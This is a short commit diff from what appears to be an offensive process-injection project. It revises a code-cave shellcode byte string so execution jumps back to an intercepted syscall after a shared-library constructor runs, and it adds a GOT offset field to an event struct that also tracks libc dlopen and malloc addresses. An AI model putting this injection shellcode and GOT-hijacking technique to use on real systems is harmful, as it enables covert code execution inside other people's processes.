Now control flow is redirected back to the syscall after running the shared library constructor instead of skipping it

2025-12-25 02:43:07 +08:00 · 2022-04-09 14:17:09 -04:00
parent 036585371c
commit e881502ffa
11 changed files with 9928 additions and 9678 deletions
--- a/src/common/constants.h
+++ b/src/common/constants.h
@@ -45,8 +45,8 @@
 "\xbe\x01\x00\x00\x00\x48\x89\xdf\
 \x48\x81\xec\x00\x10\x00\x00\xff\
 \xd0\x48\x81\xc4\x00\x10\x00\x00\x5e\
-\x5f\x5b\x5a\x59\x58\x5d\xc3"
-#define CODE_CAVE_SHELLCODE_ASSEMBLE_3_LEN 32
+\x5f\x5b\x5a\x59\x58\x5d\xff\x25\x00\x00\x00\x00"
+#define CODE_CAVE_SHELLCODE_ASSEMBLE_3_LEN 37


 #endif
--- a/src/common/map_common.h
+++ b/src/common/map_common.h
@@ -21,6 +21,7 @@ struct rb_event {
    __u64 libc_dlopen_mode_address;
    __u64 libc_malloc_address;
    __u64 got_address;
+    __s32 got_offset;
    int relro_active;
    event_type_t event_type;
 };